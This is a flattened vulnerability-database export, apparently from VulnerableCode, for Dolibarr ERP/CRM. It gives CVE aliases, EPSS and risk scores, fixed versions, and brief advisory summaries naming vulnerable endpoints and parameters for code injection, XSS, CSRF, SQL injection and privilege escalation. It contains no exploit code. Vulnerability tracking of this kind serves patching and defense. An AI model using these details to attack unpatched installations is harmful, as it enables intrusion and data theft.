https://api.first.org/data/v1/epss?cve=CVE-2017-9840 |
|
| 1 |
|
| 2 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-11u2-56qq-cye4 |
|
| 1 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 2 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 3 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 4 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 5 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 6 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 7 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 8 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 9 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 10 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 11 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 12 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 13 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 14 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 15 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 16 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 17 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 18 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 19 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 20 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 21 |
| vulnerability |
VCID-9xkp-4t9p-eqbb |
|
| 22 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 23 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 24 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 25 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 26 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 27 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 28 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 29 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 30 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 31 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 32 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 33 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 34 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 35 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 36 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 37 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 38 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 39 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 40 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 41 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 42 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 43 |
| vulnerability |
VCID-qrcg-mnfa-k7gv |
|
| 44 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 45 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 46 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 47 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 48 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 49 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 50 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 51 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 52 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 53 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 54 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 55 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 56 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 57 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 58 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
| 59 |
| vulnerability |
VCID-zjqj-1zrx-yqh6 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.4 |
|
|
| aliases |
CVE-2017-9840, GHSA-cwgm-qw8v-hrrg
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-3dpn-ry9j-rff6 |
|
| 7 |
| url |
VCID-3ewz-9zgb-efa7 |
| vulnerability_id |
VCID-3ewz-9zgb-efa7 |
| summary |
Dolibarr ERP and CRM Code Injection
Dolibarr ERP/CRM 9.0.1 provides a module named website that provides for creation of public websites with a WYSIWYG editor. It was identified that the editor also allowed inclusion of dynamic code, which can lead to code execution on the host machine. An attacker has to check a setting on the same page, which specifies the inclusion of dynamic content. Thus, a lower privileged user of the application can execute code under the context and permissions of the underlying web server. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.3 |
|
|
| aliases |
CVE-2019-11201, GHSA-jwg3-v9xm-v6q9
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-3ewz-9zgb-efa7 |
|
| 8 |
| url |
VCID-3xdg-az5a-dyft |
| vulnerability_id |
VCID-3xdg-az5a-dyft |
| summary |
Reflected Cross-Site Scripting (XSS) in Dolibarr
A Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the facid parameter. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2024-34051, GHSA-hv2j-6654-x74q
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-3xdg-az5a-dyft |
|
| 9 |
| url |
VCID-4c2v-phxx-y3h8 |
| vulnerability_id |
VCID-4c2v-phxx-y3h8 |
| summary |
Dolibarr vulnerable to Cross-Site Request Forgery
Incorrect access control in Dolibarr ERP CRM versions 19.0.0 and before, allows authenticated attackers to steal victim users' session cookies and CSRF protection tokens via user interaction with a crafted web page, leading to account takeover. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2024-31503, GHSA-6ppg-rgrg-f573
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-4c2v-phxx-y3h8 |
|
| 10 |
| url |
VCID-4j1s-mnar-1bef |
| vulnerability_id |
VCID-4j1s-mnar-1bef |
| summary |
Dolibarr vulnerable to privilege escalation
Dolibarr Open Source ERP & CRM for Business before v14.0.1 allows attackers to escalate privileges via a crafted API. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-43138 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00337 |
| scoring_system |
epss |
| scoring_elements |
0.5678 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00337 |
| scoring_system |
epss |
| scoring_elements |
0.56826 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00337 |
| scoring_system |
epss |
| scoring_elements |
0.56838 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00337 |
| scoring_system |
epss |
| scoring_elements |
0.56831 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-43138 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 6 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 7 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 8 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 9 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 10 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 11 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 12 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 13 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 14 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 15 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 16 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 17 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 18 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 19 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 20 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 21 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 22 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 23 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 24 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 25 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 26 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 27 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 28 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 29 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 30 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1 |
|
|
| aliases |
CVE-2022-43138, GHSA-gh7m-j673-wm97
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-4j1s-mnar-1bef |
|
| 11 |
| url |
VCID-62rq-q7na-9kgj |
| vulnerability_id |
VCID-62rq-q7na-9kgj |
| summary |
SQL Injection
An SQL injection vulnerability in `accountancy/customer/card.php` in Dolibarr allows remote authenticated users to execute arbitrary SQL commands via the `id` parameter. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14443 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00295 |
| scoring_system |
epss |
| scoring_elements |
0.53094 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00295 |
| scoring_system |
epss |
| scoring_elements |
0.53144 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00295 |
| scoring_system |
epss |
| scoring_elements |
0.53163 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00295 |
| scoring_system |
epss |
| scoring_elements |
0.53155 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14443 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-1xw6-g5jg-9bhq |
|
| 3 |
| vulnerability |
VCID-2avs-48u9-5kgf |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 6 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 7 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 8 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 9 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 10 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 15 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 16 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 17 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 18 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 19 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 20 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 21 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 22 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 23 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 24 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 25 |
| vulnerability |
VCID-m588-hqxv-tkgw |
|
| 26 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 27 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 28 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 29 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 30 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 31 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 32 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 33 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 34 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 35 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 36 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 37 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 38 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 39 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 40 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 41 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 9 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 10 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 11 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 12 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 13 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 14 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 15 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 16 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 17 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 18 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 19 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 20 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 21 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 22 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 23 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 24 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 25 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 26 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 27 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 28 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 29 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 30 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 31 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 32 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 33 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 34 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 35 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 36 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5 |
|
|
| aliases |
CVE-2020-14443, GHSA-8v7v-6mmm-xjxm
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-62rq-q7na-9kgj |
|
| 12 |
| url |
VCID-651j-rw3n-kkgu |
| vulnerability_id |
VCID-651j-rw3n-kkgu |
| summary |
Incorrect Authorization
Dolibarr applications do not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. A low privileged attacker can modify the `Private Note` which only an administrator should have rights to do, the affected field is in the `/adherents/note.php?id=1` endpoint. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25954 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00171 |
| scoring_system |
epss |
| scoring_elements |
0.38114 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00171 |
| scoring_system |
epss |
| scoring_elements |
0.38179 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00171 |
| scoring_system |
epss |
| scoring_elements |
0.38207 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00171 |
| scoring_system |
epss |
| scoring_elements |
0.38204 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25954 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@13.0.5 |
| purl |
pkg:composer/dolibarr/dolibarr@13.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 7 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 8 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 9 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 10 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 11 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 12 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 13 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 14 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 15 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 16 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 17 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 18 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 19 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 20 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 21 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 22 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 23 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 24 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 25 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 26 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 27 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 28 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 29 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 30 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 31 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 32 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.5 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 7 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 8 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 9 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 10 |
